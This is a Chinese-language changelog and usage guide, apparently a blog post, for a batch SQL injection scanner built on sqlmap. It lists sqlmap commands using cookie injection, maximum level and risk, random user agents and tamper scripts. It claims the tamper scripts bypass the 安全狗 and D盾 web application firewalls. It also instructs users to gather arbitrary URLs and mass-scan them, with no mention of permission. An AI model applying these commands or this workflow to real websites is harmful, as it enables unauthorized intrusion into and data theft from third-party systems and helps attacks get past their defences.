默认等级是level 1,注意一下,如果设置level=4的话,前面的三个也会一起扫描的,并不是设置level 4 就只扫描【复杂的基于BOOL类型的GET/POST盲注测试】,比如设置level 2 就会扫描 【 简单基于报错的GET/POST注入测试】 和【略复杂的基于报错页面的GET/POST注入测试】这样子
结果自动保存当前目录下的result.txt当中
页面很简陋,也没有特意的加一些别的颜色输出,结果保存也是很简单的保存在result.txt中,并没有根据时间创建一个html美观显示的文件。
原因很简单,这个2.0其实只是Langzi_Api中检测注入的一个插件,稍微提取出来独立成批量扫描网址的程序。
以后还会加入基于Union联合查询的注入方式,肯定还需优化原始代码的,因为加载这么多payload消耗时间比较多,暂时先把这个框架搭建出来吧。
Langzi_SQL_INJECTION_3.2
开发手册
群里有群基佬反馈误报很多,还表示误报多很正常,真是太伤我心了,剪了个板寸奋发图强,更新3.2版本,不移植部分功能了,直接基于sqlmap封装成一个体系,达到100%验证成功。
- 普通的注入测试
- post和cookie注入测试
- 加载脚本简单测试
- 加载脚本对post和cookie测试
- 加载脚本对高level测试,设置随机请求头等等优化
- 加载前面的全部验证功能一起验证,如果其中有一个返回了成功注入结果就停止验证。
- sqlmap.py -u url –batch
- sqlmap.py -u url –batch –cookie ‘id=1’ –level=2
- sqlmap.py -u url –batch –tamper=killdog.py
- sqlmap.py -u url –batch –cookie ‘id=1’ –level=2 –tamper=’killdog.py’
- sqlmap.py -u url –batch –tamper=killdog.py –delay 2 –time-sec=15 –timeout=20 –level 5 –risk 3 –random-agent
精简python2.7 的32版本,加上sqlmap的1.2.11.6版本一共50M,加上原文件一共60M…
使用说明
随便采集一些网址随便放在随便的一个随便文本里,带http不带http都可以。
然后启动主程序,把文本拖进去,设置扫描的等级,设置进程数,等待结果….
使用的脚本位置在
F:\CODE\Langzi_Api\GET_SQL\lib\sqlmap\tamper\space2comment.py
换脚本的话,直接更换space2comment.py这个文件的内容。
可以换成过狗,D盾之类的tamper。
会在当前目录下生成日志文件和扫描成功的结果,可以根据日志文件中内容查看sqlmap注入过程和命令,以及一些异常报错情况,结果文件很简洁直观,我感觉可以直接复制一下然后稍微编辑提交漏洞平台了。
返回结果格式内容是这样的,在result.txt中自动生成
Langzi_SQL_INJECTION_3.3
更新功能:
- 已更新tamper,可以绕过低系列的安全狗和D盾
- 生成的结果更加简洁直观
- 支持扫描动态链接和伪静态网页
生成的结果更加智能化
Langzi_SQL_INJECTION_3.7
生成结果更加详细
Langzi_SQL_INJECTION_3.8 终结版
稍微修改生成结果页面,不出意外的话,以后不会再更新了
